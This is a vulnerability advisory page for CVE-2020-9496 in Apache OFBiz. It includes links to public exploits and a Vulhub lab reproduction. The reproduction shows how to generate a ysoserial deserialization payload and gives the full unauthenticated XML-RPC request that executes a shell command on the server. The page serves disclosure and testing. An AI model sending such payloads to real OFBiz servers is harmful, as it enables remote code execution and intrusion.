MEDIUM
XML-RPC request are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03
Weakness: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
Published: 2020-07-15
Vulnerable Products
Community Advisory
This section is open source, for any additional information that enhances or clarifies the official advisory above.
CVE-2020-9496 Exploits (6)
- dwisiswant0/CVE-2020-9496 ( 4)
- jaeles-project/jaeles-signatures/cves/apache-ofbiz-xss-cve-2020-9496.yaml
- projectdiscovery/nuclei-templates/cves/CVE-2020-9496.yaml
- rapid7/metasploit-framework/modules/exploits/linux/http/apache_ofbiz_deserialiation.rb
- advisories/GHSL-2020-068-apache_ofbiz
- advisories/GHSL-2020-069-apache_ofbiz
CVE-2020-9496 Vulnerable Docker Environment
Vulhub is an open-source collection of Docker-ized vulnerable environments. No pre-existing knowledge of Docker is required, just execute two simple commands and you have a vulnerable environment.
Unsafe deserialization of XMLRPC arguments in ApacheOfBiz (CVE-2020-9496)
Apache OFBiz is an open source enterprise resource planning (ERP) system. It provides a suite of enterprise applications that integrate and automate many of the business processes of an enterprise.
OfBiz exposes an XMLRPC endpoint at /webtools/control/xmlrpc. This is an unauthenticated endpoint since authentication is applied on a per-service basis. However, the XMLRPC request is processed before authentication. As part of this processing, any serialized arguments for the remote invocation are deserialized, therefore if the classpath contains any classes that can be used as gadgets to achieve remote code execution, an attacker will be able to run arbitrary system commands on any OfBiz server with same privileges as the servlet container running OfBiz.
References:
- https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz
- https://github.com/dwisiswant0/CVE-2020-9496
- https://www.cnblogs.com/ph4nt0mer/p/13576739.html
Vulnerable environment
Executing following command to start an Apache OfBiz (17.12.01):
docker-compose up -d
After a short wait, you can see the login page at https://your-ip/myportal/control/main.
Vulnerability Reproduce
There is no error message in response by default, we can't reproduce the vulnerability using the POC of reference link 2, so ask ysoserial for help.
Generate the CommonsBeanutils1 payload:
java -jar ysoserial.jar CommonsBeanutils1 "touch /tmp/success" | base64 | tr -d "\n"
Replace the [base64-payload] and send the request:
POST /webtools/control/xmlrpc HTTP/1.1
Host: your-ip
Content-Type: application/xml
Content-Length: 4093
<?xml version="1.0"?>
<methodCall>
<methodName>ProjectDiscovery</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>test</name>
<value>
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64-payload]</serializable>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
touch /tmp/success is succesful executing in the container:
Official CVE References
View references (6)
- packetstormsecurity.com/files/158887/Apache-OFBiz-XML-RPC-Java-Deserialization.html
- apache.org/thread.html/[email protected]%3Cuser.ofbiz.apache.org%3E
- apache.org/thread.html/[email protected]%3Cuser.ofbiz.apache.org%3E
- apache.org/thread.html/[email protected]%3Cannounce.apache.org%3E
- apache.org/thread.html/[email protected]%3Cnotifications.ofbiz.apache.org%3E
- apache.org/l0994